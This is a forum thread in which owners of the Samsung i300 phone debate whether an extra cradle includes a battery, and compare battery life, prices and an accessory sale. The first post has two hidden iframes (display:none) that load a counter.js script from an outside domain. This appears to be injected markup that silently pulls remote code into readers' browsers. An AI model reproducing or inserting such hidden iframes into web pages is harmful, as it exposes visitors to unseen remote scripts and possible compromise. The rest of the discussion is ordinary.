+ Reply to Thread

Cradle & Extended Battery

Given that a battery comes with a cradle, and that the extended battery and the standard battery are the same price, has anyone found a cradle that comes with the extended battery? I am going to have to get another cradle for syncing at work, but this device definity needs a better battery solution as well.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I just double checked on the Samsung site before I posted, but I am not aware of any charger that comes with a battery. Of course the one thats included with the phone does but other than that...I'm not sure I understand what is missing in the "battery solution." Perhaps you can elaborate Tennis. I agree that since they are priced the same, why not throw one in. I also understand that Samsung is here to make a dollar though.

I remember yaesr ago when Sprint PCS hit the market, their extended batteries were more expensive and weren't recepted too well. If they price it correctly, as I feel they have, they at least get another sale.

Thanks funny, fikse (from this forum) told me the cradle does come with and extra battery. Maybe it comes with one from one site, but not the other. (refering to the Samsung and Sprint sites)

By "battery solution", I mean a way to carry the i300 around for more than +/- 12 hrs, without your batteries running out.

I don't know what Fikse is referring to. I haven't heard that. To tell you the... I don't know. That would be great to always have a charged battery at the office as well as at home, but I didn't realize Samsung or Sprint were footing the bill for that luxury.

You must use your Palm quite a bit for your batteries to expire so quickly. Mine seem to last a bit longer than 12 hours. Not sure of exactly how long though.

Administrator

Arrow

no disrespect to the boss (fkise), but i myself have not seen that optuon anywhere... maybe ebay?

when you buy a cradle you wont get anything else with it.. the extended batts are extra...

if you rememebr the place where the big boss told you, post it here so us left in the dark can see it!

Marctronixx, have you actually purchased an extra cradle or are you just going by the descriptions on the web sites? I too did not see where either site said that you get a standard battery with a cradle purchase, thats why I asked in my earlier post. You can just search the forum for threads I started to find my previous post.

How about it from others who have purchased an extra cradle. Please let us know if it came with a standard battery or not. Please include where you purchased it as well.

I really doubt a battery is ever sold with the cradle. Perhaps miscommunication about the original contents including a cradle and an extra battery. But if so, I too will be deighted.

Administrator

Arrow

no i have not ordered an extra cradle, but i can asure you it does not come with a battery..much less a extended battery... why would samsung do such a thing? the only reason they threw in 2 batts with the phone is because the low hours they can be used... that makes no business sense on samsungs part to include a batery with the cradle.... :p

I bought an extra cradle and it does not come with any batteries....

Brooks

Administrator

Arrow

you heard it from the big boss himself!!!

My apoligies to fikse

That is some really wishful thinking on my part... I must of read your reply at least twice, refusing to see the dollar signs. I went back and checked, and sure enough, you said the cradle does not come with a battery.

I shelled out a pretty penny for the i300 (I guess we all have). It’s hard to grasp that I'll have to spend $59 for a cradle and probably $69 for and extended battery. Dang, throw in the service, insurance, case, etc and this device is racking a nice chunk of change for Sprint and Samsung.

Sorry, again for my dyslexia.

I really am only getting about 12hrs of battery time with the i300. I think this must have to do to the poor Sprint coverage near my home (and work for that matter)

Don't worry about it. We all read so much here that at times it can be difficult to remember what you did see and what you didn't. I think your phone may be working hard to keep the signal. There was a lot of talk initially of how the battery life would be a huge problem, but for me, and I'm sure a lot of others, its not. The only suggestion I can offer is to conserve power every moment you get. I'm sure you know this though. What do you have your auto off setting on? It sounds like you use your phone quite a bit during the day. Have you considered leaving the cradle at the office.

*Did you see the post about the 20% off accessories at Samsung?